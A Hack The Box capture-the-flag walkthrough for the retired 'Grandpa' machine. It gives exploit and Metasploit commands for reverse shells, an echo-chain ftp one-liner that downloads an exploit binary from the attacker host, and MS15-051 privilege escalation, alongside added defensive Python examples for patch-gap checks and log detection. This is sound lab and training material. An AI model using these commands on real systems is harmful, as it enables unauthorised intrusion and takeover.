Capture the flag (CTF)

Hack the Box (HTB) Machines Walkthrough Series — Grandpa

April 4, 2019 by Security Ninja

Continuing with our series on Hack The Box (HTB) machines, this article contains the walkthrough of an HTB machine named Grandpa.


HTB is an excellent platform that hosts machines running multiple OSes, along with a range of other challenges. To get an account, individuals have to solve an entry puzzle (simple enumeration plus a bit of pentesting); once logged in, they download a VPN pack to connect to the machines hosted on the HTB platform.

Note: Writeups of only retired HTB machines are allowed. The machine in this article, named Grandpa, is retired.

The Walkthrough

Let’s start with this machine.

1. Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN.

2. The Grandpa machine IP is 10.10.10.14.

3. We will adopt the same penetration-testing methodology we have used before. Let’s start with enumeration, to gain as much information about the machine as possible.

4. As usual, let’s start with an Nmap scan to gather information about the services running on this machine.
<< nmap -sC -sV -oA grandpa 10.10.10.14 >>

5. As we can see, port 80 is open, with IIS 6.0 running behind it.

6. Searching for IIS 6.0 exploits, we can see that a number of them are available. The one we will use is this.

7. Here is a sample exploit for the vulnerability mentioned above. Download it as exploit.py and run it as shown below. (Note: Make sure to revert the box before running this.)
<< python exploit.py 10.10.10.14 80 <attacking machine ip> 80 >>

8. With nc listening on port 1234 on our attacking machine, we get a reverse shell back.

9. Checking what roles and permissions we have in the reverse shell, it looks like we landed as the “nt authority\network service” account, which has very few privileges.

10. To escalate privileges, we can use Windows Exploit Suggester. One of the inputs this tool needs is the system information: run systeminfo on the victim machine and save the output as system.txt on the attacking machine.

11. First, update the Windows Exploit Suggester by using the following command.
<< python windows-exploit-suggester.py --update >>

12. Now that the Windows Exploit Suggester database is updated, let’s run the utility to check for possible exploits on this machine.
<< python windows-exploit-suggester.py --database 2018-12-29-mssb.xlsx --systeminfo system.txt >>

13. Above, we can see that, with the current machine profile, a lot of exploits are possible. We can try MS15-051.
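What Windows Exploit Suggester does in steps 10 to 13, reduced to its core as an added example (not the tool's own code and not part of the original walkthrough): parse a systeminfo dump and report bulletins whose fixing KB is not installed. The systeminfo text and the bulletin table below are constructed samples; the tool builds that table from the MSSB spreadsheet, which is the authoritative source. On the defending side the same check confirms a patch baseline before anyone tests it with an exploit.

```python
import re

# Constructed sample of `systeminfo` output, in the shape a Server 2003 host prints it.
SAMPLE_SYSTEMINFO = """\
Host Name:                 EXAMPLE-2003
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
System Type:               X86-based PC
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
"""

# Sample table: bulletin -> (OS-name substring it applies to, KBs that fix it).
# MS15-051 is the bulletin used in the walkthrough; KB3045171 is the update from that bulletin.
# A real run would populate this from the MSSB spreadsheet (see the --database option above).
SAMPLE_BULLETINS = {
    "MS15-051": ("Server 2003", {"KB3045171"}),
}

# Hotfix lines look like "[01]: KB1234567" or, on older systems, "[01]: Q147222".
HOTFIX_RE = re.compile(r"\[\d+\]:\s*((?:KB|Q)\d+)", re.IGNORECASE)

def parse_systeminfo(text):
    """Return os_name, os_version and the set of installed hotfix IDs (upper-cased)."""
    info = {"os_name": "", "os_version": "", "hotfixes": set()}
    for line in text.splitlines():
        key, _, value = line.partition(":")
        key = key.strip().lower()
        if key == "os name":
            info["os_name"] = value.strip()
        elif key == "os version":
            info["os_version"] = value.strip()
        m = HOTFIX_RE.search(line)
        if m:
            info["hotfixes"].add(m.group(1).upper())
    return info

def missing_bulletins(info, bulletins):
    """Bulletins that apply to this OS and whose fixing KBs are all absent from the hotfix list."""
    missing = []
    for bulletin, (os_match, kbs) in sorted(bulletins.items()):
        if os_match.lower() in info["os_name"].lower() and not (kbs & info["hotfixes"]):
            missing.append(bulletin)
    return missing

if __name__ == "__main__":
    parsed = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(parsed["os_name"], "|", parsed["os_version"])
    print("installed hotfixes:", sorted(parsed["hotfixes"]))
    print("unpatched bulletins:", missing_bulletins(parsed, SAMPLE_BULLETINS))
```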

14. We can clone all the popular Windows exploits in compiled form from this repo.

15. Now the next challenge is to transfer the files from the attacking machine to the target machine.

16. Since the nmap results showed that the PUT method is enabled, we can try exploiting that with a WebDAV client such as Cadaver.
<< cadaver http://10.10.10.14/dav >>

17. Above, we can see that permission is denied: although the PUT method is enabled, there is no directly writable directory, and there are no valid collections either.
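From the server's side, the WebDAV attempt in steps 16 and 17 leaves a clear trail in the IIS W3C log. The example below is added here and is not part of the original walkthrough: it parses a constructed IIS 6.0 log excerpt (the #Fields header drives the column mapping) and reports, per client, how many content-changing WebDAV requests were attempted and how many the server actually accepted. The final 201 line is constructed to show what an accepted upload would look like; the walkthrough's own attempt was denied.

```python
from collections import defaultdict

# Constructed IIS 6.0 W3C log excerpt (not taken from the real box).
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2019-04-04 10:00:01 10.10.10.14 GET /default.htm - 80 - 10.10.14.6 browser 200
2019-04-04 10:00:02 10.10.10.14 OPTIONS /dav - 80 - 10.10.14.6 dav-client 200
2019-04-04 10:00:03 10.10.10.14 PROPFIND /dav - 80 - 10.10.14.6 dav-client 207
2019-04-04 10:00:04 10.10.10.14 PUT /dav/test.txt - 80 - 10.10.14.6 dav-client 403
2019-04-04 10:00:05 10.10.10.14 PUT /dav/test.txt - 80 - 10.10.14.6 dav-client 201
"""

# Methods that change server-side content; a 2xx on any of them means a write was accepted.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the most recent #Fields line."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#"):
            continue          # other directives (#Software, #Version, #Date)
        elif fields:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))

def webdav_write_attempts(text):
    """Per client IP: count of write attempts, count accepted, and 'METHOD uri -> status' events."""
    report = defaultdict(lambda: {"attempts": 0, "accepted": 0, "events": []})
    for rec in parse_w3c(text):
        method = rec["cs-method"].upper()
        if method not in WRITE_METHODS:
            continue
        entry = report[rec["c-ip"]]
        entry["attempts"] += 1
        if rec["sc-status"].startswith("2"):
            entry["accepted"] += 1
        entry["events"].append(f"{method} {rec['cs-uri-stem']} -> {rec['sc-status']}")
    return dict(report)

if __name__ == "__main__":
    for ip, entry in webdav_write_attempts(SAMPLE_IIS_LOG).items():
        print(ip, entry["attempts"], "attempts,", entry["accepted"], "accepted")
        for ev in entry["events"]:
            print("   ", ev)
```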

18. The next thing to try is something that is already on the target box. Since this is a Windows Server 2003 SP2 box, we can use the built-in FTP utility to transfer the .exe file.

19. Before that, we need to find a writable directory on the victim box.
<< dir >>

20. From the above, the directory “wmpub” is writable. Before we run the ftp command to fetch the binary, we need to serve the binary from our attacking machine over FTP.

21. Run the command below to serve everything in the current directory via FTP. (Make sure to copy the MS15-051 exe into the directory first.)
<< python -m pyftpdlib -p 21 >>

22. After the binary is hosted, run the following on the victim to connect and download the relevant binary from the attacking machine.
<< echo open 10.10.14.6>ftp_commands.txt&echo anonymous>>ftp_commands.txt&echo password>>ftp_commands.txt&echo binary>>ftp_commands.txt&echo get ms15051.exe>>ftp_commands.txt&echo bye>>ftp_commands.txt&ftp -s:ftp_commands.txt >>

23. After that, we can see below that the FTP session was created and the relevant binary was downloaded.
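The echo-chain plus ftp -s: transfer in steps 20 to 23 is a well-known way of pulling files onto a host with only built-in tools, and it is equally recognisable in process-creation telemetry. The example below is added here and is not part of the original walkthrough: it classifies constructed process-creation records (Sysmon Event ID 1 / Security 4688 style, modelled on the command above) by whether ftp.exe is driven from a script file, whether that file was written by echo redirects in the same command line, and whether FTP transfer verbs were echoed into it.

```python
import re

# Constructed process-creation records (not real telemetry); "CommandLine" is the field we inspect.
SAMPLE_EVENTS = [
    {"Image": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": "cmd.exe /c echo open 10.10.14.6>ftp_commands.txt&echo anonymous>>ftp_commands.txt"
                    "&echo password>>ftp_commands.txt&echo binary>>ftp_commands.txt"
                    "&echo get ms15051.exe>>ftp_commands.txt&echo bye>>ftp_commands.txt&ftp -s:ftp_commands.txt"},
    {"Image": r"C:\WINDOWS\system32\ftp.exe", "CommandLine": "ftp -s:ftp_commands.txt"},
    {"Image": r"C:\WINDOWS\system32\ftp.exe",
     "CommandLine": "ftp -n -s:C:\\scripts\\nightly_backup.txt ftp.example.internal"},
    {"Image": r"C:\WINDOWS\system32\cmd.exe", "CommandLine": "cmd.exe /c dir C:\\wmpub"},
]

# ftp[.exe] ... -s:<scriptfile>   (the script file name ends at whitespace or a command separator)
FTP_SCRIPT_RE = re.compile(r"\bftp(?:\.exe)?\b[^&|]*\s-s:([^\s&|]+)", re.IGNORECASE)
# echo <text> > or >> <file>      (captures the file each echo redirect writes to)
ECHO_REDIRECT_RE = re.compile(r"\becho\b[^&|>]*>+\s*([^\s&|]+)", re.IGNORECASE)
# Words that only make sense as lines of an ftp script.
FTP_VERBS = {"open", "user", "anonymous", "binary", "get", "mget", "put", "bye"}

def classify(event):
    """Return the rule names triggered by one process-creation record, weakest first."""
    cmd = event["CommandLine"]
    hits = []
    script = FTP_SCRIPT_RE.search(cmd)
    if script:
        hits.append("ftp_scripted_session")
        targets = {t.strip('"') for t in ECHO_REDIRECT_RE.findall(cmd)}
        if script.group(1).strip('"') in targets:
            hits.append("ftp_script_built_inline")      # script written and consumed in one line
        echoed = {w.lower() for w in re.findall(r"\becho\s+(\w+)", cmd, re.IGNORECASE)}
        if FTP_VERBS & echoed:
            hits.append("ftp_transfer_verbs_echoed")    # open/get/binary/bye went into the script
    return hits

def suspicious_events(events):
    """(command line, triggered rules) for every record that triggered at least one rule."""
    out = []
    for event in events:
        hits = classify(event)
        if hits:
            out.append((event["CommandLine"], hits))
    return out

if __name__ == "__main__":
    for cmdline, hits in suspicious_events(SAMPLE_EVENTS):
        print(", ".join(hits), "<-", cmdline[:70])
```

A plain ftp -s: run (the scheduled backup record) triggers only the weakest rule; the one-liner from step 22 triggers all three, which is the combination worth alerting on.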

24. Running the downloaded binary on the victim machine hangs the machine. I tried multiple other exploits as well, but with the same results.

25. Since the above approach did not work, let’s switch to Metasploit. We will replicate the same strategy and exploits via Metasploit to see if it helps us escalate privileges.

26. First, revert the machine and run the msfconsole.

27. Use exploit/windows/iis/iis_webdav_scstoragepathfromurl and set the options as shown below.

<< use exploit/windows/iis/iis_webdav_scstoragepathfromurl >>

<< options >>

<< set RHOST 10.10.10.14 >>

<< set LHOST <attacking machine ip> >>

<< set LPORT 1234 >>

28. After setting the options, run the exploit and a reverse Meterpreter TCP shell should be spawned.
<< exploit >>

29. Since we now need to escalate privileges, let’s background this session and use exploit/windows/local/ms15_051_client_copy_image.

<< use exploit/windows/local/ms15_051_client_copy_image >>

<< options >>

30. As we can see, it requires a valid session, so we set SESSION to 1, the session opened as a Meterpreter shell.
<< set SESSION 1 >>

31. After that, set the payload to windows/meterpreter/reverse_tcp as below:

<< set payload windows/meterpreter/reverse_tcp >>

<< set LHOST <attacking machine ip> >>

<< set LPORT 4422 >>

32. We run the exploit and it fails as well, since the current Meterpreter shell from SESSION 1 does not even have permission to run getuid.
<< exploit >>

33. We can confirm that by going back to the main session and running the getuid command.

<< sessions -i 1 >>

<< getuid >>

34. Note that in the manual process earlier, we got the shell as “network service.”

35. Let’s migrate the current Meterpreter process into a process running as “network service.” In this case, we choose PID 1804.

<< migrate 1804 >>

<< getuid >>

36. After the successful migration, running the getuid command produces the desired output.

37. Now background this session, go back to the other session for ms15-051 and run the exploit.

<< options >>

<< exploit >>

<< getuid >>

38. The exploit ran successfully, and we got the SYSTEM shell.

39. Run post commands such as shell to spawn a command shell.
<< shell >>

40. Browse to “Documents and Settings/Harry/Desktop” to grab the user.txt file.

<< cd "Documents and Settings/Harry/Desktop" >>

<< type user.txt >>

41. Browse to “Documents and Settings/Administrator/Desktop” to grab the root.txt file.

<< cd "Documents and Settings/Administrator/Desktop" >>

<< type root.txt >>

We did it!


This was a real fun box with some really old vulnerabilities. I will try to run it completely without Metasploit as usual. We will continue this series with more such interesting machines.
